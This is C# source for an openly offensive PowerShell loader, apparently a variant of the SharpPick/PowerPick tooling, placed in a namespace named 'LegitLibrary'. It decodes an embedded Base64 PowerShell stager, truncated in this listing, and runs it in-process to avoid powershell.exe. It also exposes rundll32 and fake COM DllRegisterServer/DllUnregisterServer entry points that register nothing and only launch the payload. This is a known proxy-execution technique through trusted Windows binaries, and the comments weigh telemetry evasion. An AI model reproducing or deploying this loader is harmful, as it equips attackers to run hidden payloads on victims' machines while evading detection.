- /*
- * SharpPick aka InexorablePoSH
- * Description: Application to load and run powershell code via the .NET assemblies
- * License: 3-Clause BSD License. See Veil PowerTools Project
- *
- * This application is part of Veil PowerTools, a collection of offensive PowerShell
- * capabilities. Hope they help!
- *
- * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
- */
- using System;
- using System.IO;
- using System.Resources;
- using System.Collections.Generic;
- using System.Linq;
- using System.Text;
- using System.Net;
- //Adding libraries for powershell stuff
- using System.Collections.ObjectModel;
- using System.Management.Automation;
- using System.Management.Automation.Runspaces;
- using System.Diagnostics;
- using System.Reflection;
- using System.Runtime.InteropServices;
- using RGiesecke.DllExport;
- namespace LegitLibrary
- {
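public class Program
{
    /// <summary>
    /// Executes <paramref name="cmd"/> as a PowerShell script inside an in-process
    /// runspace (no powershell.exe is spawned) and returns what the pipeline wrote,
    /// rendered to text through Out-String.
    /// </summary>
    /// <param name="cmd">Script text. It is handed to AddScript verbatim -- nothing
    /// here validates or constrains it, so whatever supplies this string has full
    /// code execution in this process.</param>
    /// <returns>The concatenated, trimmed text output of the pipeline; an empty
    /// string when the script emitted nothing.</returns>
    /// <remarks>
    /// Only the success stream is returned. Non-terminating errors end up on
    /// pipeline.Error and are silently dropped; a terminating error surfaces as the
    /// exception thrown by Invoke(). NOTE(review): the script still runs inside
    /// System.Management.Automation, so do not assume that hosting it this way
    /// hides it from in-engine telemetry -- confirm against the target engine version.
    /// </remarks>
    public static string RunPS(string cmd)
    {
        StringBuilder output = new StringBuilder();
        // using-blocks make Close()/Dispose() run even when Invoke() throws; the
        // previous version only closed the runspace on the happy path, leaking it on error.
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                pipeline.Commands.AddScript(cmd);
                // Out-String flattens the emitted objects to text so the caller
                // receives one string instead of a collection of PSObjects.
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> records = pipeline.Invoke();
                foreach (PSObject record in records)
                {
                    output.Append(record);
                }
            }
        }
        return output.ToString().Trim();
    }
}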
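public class Service
{
    // Base64 over the UTF-16LE bytes of the PowerShell stager that Exec() runs.
    // In this listing the blob is truncated ("...[SNIP]"), so it is NOT valid
    // Base64 and Convert.FromBase64String will throw FormatException; a real
    // build carries the complete string here.
    private const string Stager = "WwBSAEUARgBdAC4AQQBTAFM...[SNIP]";

    /// <summary>
    /// Decodes the embedded stager and executes it in-process via Program.RunPS.
    /// The script's output is discarded.
    /// </summary>
    /// <remarks>
    /// Nothing here catches exceptions: a malformed blob (FormatException) or a
    /// terminating PowerShell error propagates to the caller. The callers in this
    /// file are unmanaged exports, so such an exception escapes into the native
    /// host process that loaded the DLL.
    /// </remarks>
    public static void Exec()
    {
        RunEncoded(Stager);
    }

    // Decodes a Base64/UTF-16LE script and runs it. Kept separate from Exec() so
    // the decoding step can be exercised without touching the embedded blob.
    private static void RunEncoded(string encodedScript)
    {
        byte[] raw = Convert.FromBase64String(encodedScript);
        string script = Encoding.Unicode.GetString(raw);
        // Return value intentionally ignored: the stager is fire-and-forget and the
        // previous version assigned it to a local that was never read.
        Program.RunPS(script);
    }
}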
class Exports
{
    // Single funnel for all three exports so the entry points cannot drift apart.
    private static void Launch()
    {
        Service.Exec();
    }

    /// <summary>
    /// Export carrying the (hwnd, hinst, lpszCmdLine, nCmdShow) signature that
    /// rundll32.exe uses when it invokes a named DLL entry point. Every argument is
    /// ignored; the embedded stager runs regardless of the command line passed.
    /// </summary>
    [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
    public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
    {
        Launch();
    }

    /// <summary>
    /// COM self-registration export, the function regsvr32.exe calls on the DLL it
    /// is given. Registers nothing; it only runs the stager. The COM contract
    /// declares this as returning an HRESULT, but this export returns void, so the
    /// status regsvr32 reports afterwards is not meaningful -- the payload has
    /// already executed by the time it returns.
    /// </summary>
    [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllRegisterServer()
    {
        Launch();
    }

    /// <summary>
    /// COM un-registration export (regsvr32.exe /u). Same behaviour as
    /// DllRegisterServer: nothing is unregistered, the stager simply runs.
    /// </summary>
    [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
    public static void DllUnregisterServer()
    {
        Launch();
    }
}
- }